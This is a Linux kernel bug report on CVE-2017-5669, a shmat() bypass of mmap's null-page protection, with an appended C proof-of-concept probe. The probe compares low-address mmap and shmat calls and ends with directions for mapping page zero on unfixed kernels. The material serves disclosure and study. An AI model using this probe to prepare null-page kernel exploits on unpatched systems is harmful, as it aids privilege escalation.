Bug 192931 - Shmat allows mmap null page protection bypass
Summary: Shmat allows mmap null page protection bypass
Alias: None
Product: Memory Management
Classification: Unclassified
Component: Other
Hardware: All
OS: Linux
Importance: P1 normal
Assignee: Andrew Morton
Depends on:
Reported: 2017-01-20 05:03 UTC by Gareth Evans
Modified: 2020-07-27 10:48 UTC
CC: 3 users

See Also:
Kernel Version: 4.4.0-57-generic
Regression: No
Bisected commit-id:

Proof of Concept (1.23 KB, text/x-csrc)
2017-01-20 05:03 UTC, Gareth Evans

Description Gareth Evans 2017-01-20 05:03:33 UTC
Created attachment 252511
Proof of Concept

The null page protection mechanisms implemented in shmat are not consistent with those in mmap and allow a privileged user to map the null page. When a privileged user attempts to mmap an address below 64k, it is treated as essentially passing a NULL value in the addr argument and returns a random address. With shmat, the root user is simply provided the address they requested, essentially bypassing this protection afforded by mmap. Please see attached proof of concept code.
Comment 1 Gareth Evans 2017-02-03 12:17:11 UTC
This bug has been assigned CVE-2017-5669
Comment 2 Gareth Evans 2017-02-21 13:55:24 UTC
This issue has been resolved in Linux v4.11 https://git.kernel.org/cgit/linux/kernel/git/next/linux-next.git/commit/?id=e1d35d4dc7f089e6c9c080d556feedf9c706f0c7
Comment 3 Emily 2020-07-27 10:48:16 UTC
Just to note the above fix was reverted/adjusted in
v4.17-rc7 to only fail in the presence of the SHM_REMAP flag.


New patch direct link:

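Added example, not part of this bug report or the attached PoC: a small C program that probes the two paths the description contrasts (an mmap() hint below mmap_min_addr versus an explicit shmat() address, with an mmap(MAP_FIXED) at the same address for comparison) and models, from my reading of ipc/shm.c, the SHM_RND round-down in do_shmat() before the v4.11 fix, after it, and after the v4.17-rc7 adjustment mentioned in comment 3. It assumes Linux on x86-64 (SHMLBA equal to the 4 KiB page size); the address 0x1000 is a constructed value below the default 64 KiB vm.mmap_min_addr, and LOW_ADDR, shmat_model and run_probe are names chosen for this example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/shm.h>

/* Constructed probe address: one page, below the usual 64 KiB mmap_min_addr. */
#define LOW_ADDR  ((void *)0x1000UL)
#define PROBE_LEN 4096UL

/* Which version of the do_shmat() address handling to model. */
enum shmat_policy { PRE_4_11, FIX_4_11, FIX_4_17 };

/*
 * Model (my reading of ipc/shm.c, not the kernel's code; assumes
 * SHMLBA == PAGE_SIZE as on x86) of what do_shmat() does with a non-zero
 * addr before passing it to do_mmap() with MAP_FIXED. Returns the address
 * that would be mapped, or -EINVAL.
 *   PRE_4_11: SHM_RND rounds down unconditionally, so addr < shmlba becomes
 *             0 and MAP_FIXED then targets the null page.
 *   FIX_4_11: the v4.11 fix refuses a round-down that would reach 0.
 *   FIX_4_17: the v4.17-rc7 change refuses it only when SHM_REMAP is set.
 */
static long shmat_model(enum shmat_policy p, uintptr_t addr,
                        uintptr_t shmlba, int shmflg)
{
    if (addr & (shmlba - 1)) {
        if (!(shmflg & SHM_RND))
            return -EINVAL;              /* misaligned and no rounding asked */
        if (p == FIX_4_11 && addr < shmlba)
            return -EINVAL;              /* would round down to NULL */
        addr &= ~(shmlba - 1);           /* round down to SHMLBA */
        if (p == FIX_4_17 && addr == 0 && (shmflg & SHM_REMAP))
            return -EINVAL;
    }
    return (long)addr;                   /* kernel maps here with MAP_FIXED */
}

struct probe {
    void *mmap_hint;  int mmap_hint_errno;  /* mmap(): low hint, no MAP_FIXED */
    void *mmap_fixed; int mmap_fixed_errno; /* mmap(): MAP_FIXED at LOW_ADDR  */
    void *shmat_low;  int shmat_errno;      /* shmat(): explicit LOW_ADDR     */
};

/* Issue the three calls and record result or errno; mappings are released. */
static struct probe run_probe(void)
{
    struct probe r = { MAP_FAILED, 0, MAP_FAILED, 0, (void *)-1, 0 };
    int id;

    r.mmap_hint = mmap(LOW_ADDR, PROBE_LEN, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    r.mmap_hint_errno = r.mmap_hint == MAP_FAILED ? errno : 0;
    if (r.mmap_hint != MAP_FAILED)
        munmap(r.mmap_hint, PROBE_LEN);

    r.mmap_fixed = mmap(LOW_ADDR, PROBE_LEN, PROT_READ | PROT_WRITE,
                        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    r.mmap_fixed_errno = r.mmap_fixed == MAP_FAILED ? errno : 0;
    if (r.mmap_fixed != MAP_FAILED)
        munmap(r.mmap_fixed, PROBE_LEN);

    id = shmget(IPC_PRIVATE, PROBE_LEN, IPC_CREAT | 0600);
    if (id < 0) {
        r.shmat_errno = errno;           /* no SysV IPC available here */
        return r;
    }
    r.shmat_low = shmat(id, LOW_ADDR, 0);
    r.shmat_errno = r.shmat_low == (void *)-1 ? errno : 0;
    if (r.shmat_low != (void *)-1)
        shmdt(r.shmat_low);
    shmctl(id, IPC_RMID, NULL);
    return r;
}

static void report(const char *what, void *p, int err, void *failed)
{
    if (p == failed)
        printf("%-24s failed: %s\n", what, strerror(err));
    else
        printf("%-24s -> %p\n", what, p);
}

int main(void)
{
    struct probe r = run_probe();
    report("mmap(hint 0x1000)", r.mmap_hint, r.mmap_hint_errno, MAP_FAILED);
    report("mmap(MAP_FIXED 0x1000)", r.mmap_fixed, r.mmap_fixed_errno, MAP_FAILED);
    report("shmat(addr 0x1000)", r.shmat_low, r.shmat_errno, (void *)-1);
    return 0;
}
```

Unprivileged, the hint is ignored (mmap returns a normal high address) and both the MAP_FIXED mmap and the shmat fail with EPERM from the mmap_min_addr check; with CAP_SYS_RAWIO both fixed mappings land at 0x1000, which is the contrast the description draws between the hint path and shmat's MAP_FIXED path. To reach the null page itself on an unfixed kernel, pass an address below SHMLBA together with SHM_RND (0x800 in the model) so the round-down produces 0.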